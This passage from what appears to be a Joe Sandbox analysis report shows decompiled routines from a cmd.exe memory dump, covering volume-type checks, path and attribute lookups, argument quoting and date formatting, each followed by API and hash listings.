				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0x1213cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0x1213cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E011E4C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E011E0D89(_t109, _t81);
						E011E0CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0x1213cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}






























                                    0x011e3121
                                    0x011e312c
                                    0x011e3133
                                    0x011e313e
                                    0x011e3146
                                    0x011e3148
                                    0x011e3154
                                    0x011e315c
                                    0x011e315e
                                    0x011e3160
                                    0x011e3168
                                    0x011e3170
                                    0x011e3174
                                    0x011e3180
                                    0x011e3188
                                    0x011e3193
                                    0x011e319a
                                    0x011e31a9
                                    0x011e31d5
                                    0x011edbf0
                                    0x011edbfa
                                    0x00000000
                                    0x011e3229
                                    0x011e3229
                                    0x011e322f
                                    0x011e3237
                                    0x011e3239
                                    0x011e3239
                                    0x011e3245
                                    0x011e3251
                                    0x011e3257
                                    0x011e325f
                                    0x011e3261
                                    0x011e3261
                                    0x011e326e
                                    0x011e327e
                                    0x011e3283
                                    0x011e328b
                                    0x011edbb6
                                    0x011edbb6
                                    0x011e3291
                                    0x011e3296
                                    0x011e3310
                                    0x011e3310
                                    0x011e32b3
                                    0x011edbd3
                                    0x011edbd9
                                    0x011edbe1
                                    0x011edbe5
                                    0x011e32b9
                                    0x011e32b9
                                    0x011e32c1
                                    0x011e3318
                                    0x011e3318
                                    0x011e32c9
                                    0x011e32d3
                                    0x011edbc8
                                    0x011edbd0
                                    0x011edbfc
                                    0x011edbfc
                                    0x011edbfc
                                    0x011edbc8
                                    0x011e32d3
                                    0x011e32b3
                                    0x011e3251
                                    0x011e32df
                                    0x011e32e9
                                    0x011e32f6
                                    0x011e330f

                                    APIs
                                    • memset.MSVCRT ref: 011E3160
                                    • memset.MSVCRT ref: 011E3180
                                    • memset.MSVCRT ref: 011E31A9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011E32AB
                                    • _wcsicmp.MSVCRT ref: 011E32C9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32DF
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32E9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$InformationVolume_wcsicmp
                                    • String ID: FAT
                                    • API String ID: 4247940253-238207945
                                    • Opcode ID: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                    • Instruction ID: 2f8af6c6ac2adc470c54c2c8a728e0d2c05dde3b0e6128891aa713d2ca43ffdb
                                    • Opcode Fuzzy Hash: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                    • Instruction Fuzzy Hash: 365143B1A106199BDF28CAE4DC9DBEA77F8FB14348F0400E9E519E3141EB759E84CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E011DAD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E011E6FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E011E0C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E011E22C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E011E68BA(E011E6A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E011DCD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}






































                                    0x011dad4c
                                    0x011dad52
                                    0x011dad59
                                    0x011dad60
                                    0x011dad62
                                    0x011dad64
                                    0x011dad6b
                                    0x011daeac
                                    0x011dae71
                                    0x011dae78
                                    0x011dae79
                                    0x011dae7a
                                    0x011dae85
                                    0x011dae85
                                    0x011dad76
                                    0x011dad7f
                                    0x011dad81
                                    0x011dad8c
                                    0x011dad95
                                    0x011dada0
                                    0x011dadc0
                                    0x011dae61
                                    0x011dae68
                                    0x011dae6f
                                    0x00000000
                                    0x011dae6f
                                    0x011dadc6
                                    0x011dadcf
                                    0x011f122a
                                    0x011f122a
                                    0x011dadf0
                                    0x011dadf4
                                    0x011dae5f
                                    0x011dae5f
                                    0x00000000
                                    0x011dadf6
                                    0x011dadf6
                                    0x011dadff
                                    0x011f1233
                                    0x011f1233
                                    0x011dae0d
                                    0x011dae13
                                    0x011dae18
                                    0x011f123c
                                    0x011f1240
                                    0x011f1245
                                    0x011f1249
                                    0x011f124f
                                    0x011f1257
                                    0x011f1276
                                    0x011f125d
                                    0x011f1263
                                    0x011f1266
                                    0x011f1270
                                    0x011f1270
                                    0x011f127f
                                    0x011f1285
                                    0x011f1285
                                    0x00000000
                                    0x011dae1e
                                    0x011dae1e
                                    0x011dae24
                                    0x011f12b0
                                    0x011dae33
                                    0x011dae37
                                    0x011dae53
                                    0x011dae56
                                    0x011dae5d
                                    0x011dae86
                                    0x011dae8c
                                    0x011dae90
                                    0x011f1296
                                    0x011f129e
                                    0x011f129e
                                    0x011f1296
                                    0x011dae90
                                    0x011dae5d
                                    0x00000000
                                    0x011dae24
                                    0x011dae18

                                    APIs
                                    • memset.MSVCRT ref: 011DAD95
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 011DADEA
                                    • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 011DAE0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DAE68
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 011F128D
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • wcsstr.MSVCRT ref: 011F1249
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F1266
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F12A5
                                      • Part of subcall function 011E68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                    • String ID: \\.\
                                    • API String ID: 52035941-2900601889
                                    • Opcode ID: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                    • Instruction ID: b9982ff7bba0fc8d7c8cb2771a2f88bc23f943d8e867d9336029e6e3ccd5e984
                                    • Opcode Fuzzy Hash: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                    • Instruction Fuzzy Hash: DE411C75504351ABDB38DFA8A888A6FBBE8EF94714F14081DF955C3181EB30D944C7A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FAEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E011FAEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E011FB4DD(0);
				_t157 = 0x2c;
				_t191 = E011E00B0(_t157);
				if(_t191 == 0) {
					E011F9287(_t157);
					__imp__longjmp(0x120b8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E011DCB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E011E3B5D(_t159,  &_v124) == 1) {
					L57:
					E011E5D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E011E4800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E011E5590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E011F9C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0x121853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0x121853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0x121853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E011E0040(_t154[0xc]);
								E011E0040(_t154[2]);
								E011E0040(_t154);
								E011E5D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E011E6FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}













































































                                    0x011faef0
                                    0x011faef7
                                    0x011faefd
                                    0x011faeff
                                    0x011faf08
                                    0x011faf10
                                    0x011faf15
                                    0x011faf19
                                    0x011faf1c
                                    0x011faf1f
                                    0x011faf22
                                    0x011faf25
                                    0x011faf28
                                    0x011faf2b
                                    0x011faf2e
                                    0x011faf31
                                    0x011faf34
                                    0x011faf37
                                    0x011faf3a
                                    0x011faf3d
                                    0x011faf43
                                    0x011faf44
                                    0x011faf45
                                    0x011faf46
                                    0x011faf4a
                                    0x011faf50
                                    0x011faf53
                                    0x011faf56
                                    0x011faf59
                                    0x011faf5c
                                    0x011faf5f
                                    0x011faf62
                                    0x011faf63
                                    0x011faf64
                                    0x011faf65
                                    0x011faf6c
                                    0x011faf72
                                    0x011faf76
                                    0x011faf78
                                    0x011faf84
                                    0x011faf84
                                    0x011faf8d
                                    0x011faf92
                                    0x011faf9b
                                    0x011faf9d
                                    0x011fafa0
                                    0x011fafa5
                                    0x011fafaa
                                    0x011fb2a5
                                    0x011fb2a5
                                    0x011fb2aa
                                    0x011fafbe
                                    0x011fafc1
                                    0x011fafd1
                                    0x00000000
                                    0x011fafd7
                                    0x011fafd9
                                    0x011fafe3
                                    0x011fafe8
                                    0x011fafef
                                    0x00000000
                                    0x011faff5
                                    0x011faff8
                                    0x011fb007
                                    0x011fb00d
                                    0x011fb00d
                                    0x011fb012
                                    0x011fb015
                                    0x011fb019
                                    0x011fb01c
                                    0x011fb01e
                                    0x011fb01f
                                    0x011fb01f
                                    0x011fb025
                                    0x00000000
                                    0x00000000
                                    0x011fb02a
                                    0x011fb066
                                    0x011fb068
                                    0x011fb068
                                    0x011fb071
                                    0x011fb074
                                    0x011fb077
                                    0x00000000
                                    0x011fb02c
                                    0x011fb02c
                                    0x011fb032
                                    0x011fb036
                                    0x011fb03c
                                    0x011fb040
                                    0x011fb043
                                    0x011fb043
                                    0x011fb04b
                                    0x011fb04f
                                    0x011fb051
                                    0x011fb078
                                    0x011fb078
                                    0x011fb07a
                                    0x011fb07c
                                    0x011fb07c
                                    0x011fb04f
                                    0x011fb088
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011fb088
                                    0x011fb08c
                                    0x011fb08f
                                    0x011fb092
                                    0x011fb098
                                    0x011fb09e
                                    0x011fb0a4
                                    0x011fb0ad
                                    0x00000000
                                    0x011fb0b3
                                    0x011fb0b5
                                    0x011fb0bb
                                    0x011fb0bd
                                    0x011fb0c2
                                    0x011fb0c8
                                    0x011fb0cb
                                    0x011fb0d3
                                    0x011fb0d6
                                    0x011fb0d8
                                    0x011fb0d8
                                    0x011fb0de
                                    0x00000000
                                    0x00000000
                                    0x011fb0e3
                                    0x011fb0fa
                                    0x011fb0fa
                                    0x011fb0e5
                                    0x011fb0e5
                                    0x011fb0e9
                                    0x011fb0ed
                                    0x00000000
                                    0x011fb0ef
                                    0x011fb0ef
                                    0x011fb0f2
                                    0x011fb0f8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011fb0f8
                                    0x011fb0ed
                                    0x011fb103
                                    0x011fb105
                                    0x011fb10b
                                    0x011fb110
                                    0x011fb112
                                    0x011fb112
                                    0x011fb118
                                    0x00000000
                                    0x00000000
                                    0x011fb11d
                                    0x011fb134
                                    0x011fb134
                                    0x011fb136
                                    0x011fb11f
                                    0x011fb11f
                                    0x011fb123
                                    0x011fb127
                                    0x00000000
                                    0x011fb129
                                    0x011fb129
                                    0x011fb12c
                                    0x011fb132
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011fb132
                                    0x011fb127
                                    0x011fb141
                                    0x011fb143
                                    0x011fb149
                                    0x011fb14c
                                    0x011fb14c
                                    0x011fb14f
                                    0x011fb152
                                    0x011fb157
                                    0x011fb15f
                                    0x011fb163
                                    0x011fb16f
                                    0x011fb175
                                    0x011fb183
                                    0x011fb188
                                    0x011fb18e
                                    0x011fb193
                                    0x011fb29a
                                    0x011fb199
                                    0x011fb19f
                                    0x011fb1a2
                                    0x011fb1a8
                                    0x011fb1ae
                                    0x011fb1b0
                                    0x011fb1b2
                                    0x011fb1c2
                                    0x011fb1c4
                                    0x011fb1c4
                                    0x011fb1c8
                                    0x011fb1cb
                                    0x011fb1ce
                                    0x011fb1d0
                                    0x011fb1d5
                                    0x011fb1d8
                                    0x011fb1de
                                    0x011fb1de
                                    0x011fb1e4
                                    0x011fb1e4
                                    0x011fb1f0
                                    0x011fb1f5
                                    0x011fb1f9
                                    0x011fb1fa
                                    0x011fb1fd
                                    0x011fb1fd
                                    0x011fb200
                                    0x011fb20a
                                    0x011fb218
                                    0x011fb220
                                    0x011fb22b
                                    0x011fb230
                                    0x011fb233
                                    0x011fb236
                                    0x011fb23a
                                    0x011fb23e
                                    0x011fb23f
                                    0x011fb242
                                    0x011fb253
                                    0x011fb253
                                    0x011fb258
                                    0x011fb25e
                                    0x011fb261
                                    0x011fb261
                                    0x011fb188
                                    0x00000000
                                    0x011fb143
                                    0x011fb13a
                                    0x011fb13c
                                    0x011fb13f
                                    0x00000000
                                    0x011fb13f
                                    0x00000000
                                    0x011fb105
                                    0x011fb0fe
                                    0x011fb100
                                    0x00000000
                                    0x011fb264
                                    0x011fb264
                                    0x011fb265
                                    0x011fb268
                                    0x011fb0c8
                                    0x011fb277
                                    0x011fb27f
                                    0x011fb286
                                    0x011fb28b
                                    0x011fb290
                                    0x011fb290
                                    0x011fb0ad
                                    0x011fafef
                                    0x011fafd1
                                    0x011fb2bc

                                    APIs
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB4FB
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB508
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,00000000), ref: 011FAF84
                                    • qsort.MSVCRT ref: 011FB007
                                    • wcschr.MSVCRT ref: 011FB05C
                                    • calloc.MSVCRT ref: 011FB09E
                                    • calloc.MSVCRT ref: 011FB16F
                                    • wcschr.MSVCRT ref: 011FB1B8
                                    • memcpy.MSVCRT ref: 011FB20A
                                    • memcpy.MSVCRT ref: 011FB22B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 975110957-381716982
                                    • Opcode ID: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                    • Instruction ID: 44fc031d226dcfa23b8310eef3ae734f204c33c83a6329ed552545e2878315ba
                                    • Opcode Fuzzy Hash: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                    • Instruction Fuzzy Hash: C2C1D276A082159BEB28CFACD8447AEBBB1FF48714F15406DEA48E7341EB309D41CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F3CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E011F3CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0x11ff81c;
					E011E1040( &_v34, 0xd, 0x11ff7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
